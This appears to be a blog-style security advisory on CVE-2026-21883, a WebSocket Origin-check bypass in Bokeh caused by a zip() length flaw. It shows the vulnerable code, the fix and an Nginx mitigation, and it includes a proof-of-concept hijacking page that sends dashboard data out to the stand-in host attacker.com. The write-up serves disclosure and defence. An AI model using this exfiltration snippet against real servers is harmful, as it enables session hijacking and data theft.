Feb 26, 2026·6 min read·39 visits
Bokeh's WebSocket origin validator used Python's `zip()` function, which stops comparing when the shortest list ends. Attackers can register subdomains starting with a trusted name (e.g., `trustedsite.corp.attacker.com`) to trick the server into accepting the connection, leading to full session hijacking.
A logic error in the Bokeh interactive visualization library allows attackers to bypass WebSocket Origin validation. By exploiting Python's `zip()` function behavior, attackers can craft malicious subdomains that mimic trusted origins, enabling Cross-Site WebSocket Hijacking (CSWSH) to exfiltrate data or manipulate server-side state.
Bokeh is the darling of the Python data science world. It takes heavy, server-side computation and spits out beautiful, interactive HTML/JS visualizations. To make those sliders slide and those graphs update in real-time, Bokeh relies heavily on WebSockets. It’s a persistent pipe between the browser and the backend Python process.
But here is the thing about WebSockets: they don't adhere to the Same-Origin Policy (SOP) in the way XHR or Fetch does. A browser will happily open a WebSocket connection to any server that asks for it, carrying the user's cookies along for the ride. It is up to the server to look at the Origin header and say, "Hey, you're coming from evil.com, get lost."
If that check fails—or in this case, gets a little too lazy—you enter the realm of Cross-Site WebSocket Hijacking (CSWSH). It’s essentially CSRF on steroids. Instead of sending a single blind request (like "buy stock"), the attacker gets a full, two-way communication channel. They can read the response. They can see the data. In the context of Bokeh, that means they can watch your internal dashboard right alongside you.
The root cause of CVE-2026-21883 is a classic case of "it works for valid input, so ship it." The vulnerability lies in src/bokeh/server/util.py, specifically inside a function called match_host. This function is supposed to take the incoming Origin header and compare it against a configured allowlist.
The developers made a fatal assumption about Python's zip() function. For those uninitiated in Pythonic foot-guns, zip(a, b) takes two lists and iterates over them together. Crucially, it stops as soon as the shortest list is exhausted. It doesn't throw an error; it doesn't warn you. It just quietly packs up and goes home.
Imagine you have an allowlist containing dashboard.corp. You split that into ['dashboard', 'corp']. Now imagine an attacker comes along with dashboard.corp.evil.net. Split that, and you get ['dashboard', 'corp', 'evil', 'net']. When you zip() them, the loop runs twice. 'dashboard' matches 'dashboard'. 'corp' matches 'corp'. The loop finishes. The code hits return True. The server opens the door wide.
Let's look at the crime scene. The match_host function was trying to be clever by splitting hostnames by periods to handle subdomains and wildcards. Here is the logic that doomed it:
# The Vulnerable Logic
def match_host(host: str, pattern: str) -> bool:
host_parts = host.split('.')
pattern_parts = pattern.split('.')
# They checked if the pattern was longer than the host...
if len(pattern_parts) > len(host_parts):
return False
# ...but forgot to check if the HOST was longer than the PATTERN.
for h, p in zip(host_parts, pattern_parts):
if h == p or p == '*':
continue
else:
return False
return TrueSee the gap? If host_parts is longer than pattern_parts, zip just ignores the extra parts (the .evil.net part). The code assumes that if it survived the loop, it's a match.
The fix (Commit cedd113) is almost comically simple. It enforces that the lengths must match exactly (unless wildcards are involved, which are handled separately).
# The Fix
- if len(pattern_parts) > len(host_parts):
- return False
+ if len(pattern_parts) != len(host_parts):
+ return FalseThis one-character change (> to !=) closes the vulnerability completely. It forces the validation to acknowledge the entire hostname provided by the client.
Exploiting this requires a bit of setup, but it is highly realistic in corporate environments where internal DNS names are predictable. Let's assume a target organization runs a Bokeh server at ws://analytics.internal.corp.
Step 1: Reconnaissance
The attacker needs to know the allowlist. Often, this is the FQDN of the server itself. If the server expects analytics.internal.corp, that is our target string.
Step 2: Infrastructure
The attacker registers a domain or configures a subdomain they control to start with the target string. For example, they register attacker.com and create a subdomain: analytics.internal.corp.attacker.com.
Step 3: The Trap
The attacker hosts a simple HTML page on analytics.internal.corp.attacker.com:
<!-- Hosted on attacker's domain -->
<script>
// Browser sends Origin: http://analytics.internal.corp.attacker.com
var ws = new WebSocket("ws://analytics.internal.corp/ws");
ws.onopen = function() {
console.log("We are in.");
};
ws.onmessage = function(msg) {
// Exfiltrate sensitive dashboard data to attacker server
fetch("https://attacker.com/log", { method: "POST", body: msg.data });
};
</script>Step 4: Execution
The attacker sends the link to a victim who has access to the internal analytics dashboard. When the victim clicks, the WebSocket handshake initiates. The browser sends the attacker's domain as the Origin. The Bokeh server, blinded by the zip() flaw, sees analytics.internal.corp... and approves the connection. The attacker now receives a live feed of the victim's data.
You might think, "So what? They see a scatter plot." But Bokeh is an interactive library. The communication channel handles events. If the dashboard has widgets—buttons that trigger database refreshes, sliders that adjust parameters, or text inputs that run queries—the attacker can trigger those too.
Because WebSockets are bidirectional, the attacker can send messages to the server as if they were the user. In a worst-case scenario where the dashboard allows executing SQL queries or Python code based on input (which is bad design, but we see it constantly), this becomes Remote Code Execution (RCE) or SQL Injection via WebSocket.
Even without RCE, the confidentiality loss is massive. These dashboards often display proprietary trading data, patient health metrics, or infrastructure status. Bypassing the Origin check effectively bypasses the firewall for the application layer.
If you are running Bokeh <= 3.8.1, you are vulnerable. The primary fix is to upgrade to 3.8.2 or later immediately. The patch is small and safe to backport if you are stuck on a legacy version.
However, relying solely on application-level checks is playing with fire. You should enforce Origin validation at your ingress point—your reverse proxy.
If you use Nginx, explicit string matching is your friend:
location /ws {
proxy_pass http://backend;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
# Strict check. No regex unless necessary.
if ($http_origin !~* "^https?://(analytics\.internal\.corp)$") {
return 403;
}
}By killing the request at the Nginx layer, the vulnerable Python code never even executes. Security in depth means never trusting a zip() loop with your perimeter security.
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U| Product | Affected Versions | Fixed Version |
|---|---|---|
Bokeh Bokeh Project | <= 3.8.1 | 3.8.2 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-1385 |
| Attack Vector | Network |
| CVSS Score | 4.5 (Medium) |
| Impact | Data Exfiltration / Session Hijacking |
| Root Cause | Logic Error in List Iteration |
| Patch Status | Available (v3.8.2) |
The application does not verify or incorrectly verifies the Origin header of a WebSocket connection, allowing an attacker to establish a connection from an unauthorized origin.
CVE-2026-48153 is a Server-Side Request Forgery (SSRF) vulnerability in the Budibase OAuth2 SDK prior to version 3.39.0. It allows authenticated low-privileged users to bypass outbound network security blacklists and send arbitrary requests to internal subnets or cloud metadata services.
The self-hosted Slack Nebula VPN control plane, nebula-mesh, stored high-privilege enrollment tokens in plaintext inside its SQLite database. This flaw allowed any adversary with read access to the database to retrieve pending tokens and enroll unauthorized hosts into the secure VPN mesh.
The devbridge-autocomplete package (jQuery-Autocomplete) fails to escape category headers and suggestion values when using default formatters formatGroup and formatResult. If suggestions contain untrusted input, arbitrary HTML and JavaScript execute directly in the victim's browser session.
OpenCTI versions prior to 6.1.9 fail to properly restrict GraphQL schema introspection queries due to a weak pattern-matching implementation. An unauthenticated attacker can bypass the introspection block list by stripping whitespace and carriage returns, enabling complete reconnaissance of the GraphQL schema.
An unrestricted file upload vulnerability in Paymenter's support ticket system (prior to version 1.2.11) allows authenticated users to upload arbitrary PHP scripts to a web-accessible directory. The application fails to validate file extensions or MIME types before storing the files, enabling remote code execution under the web server's privilege context.
A technical analysis of CVE-2026-21887, a Server-Side Request Forgery (SSRF) vulnerability in OpenCTI. The flaw occurs in the platform's data ingestion mechanism, which processes user-supplied feed URLs via Axios under a default configuration. Authenticated users with low privileges can exploit this to pivot into internal infrastructure, target metadata services, and scan private networks.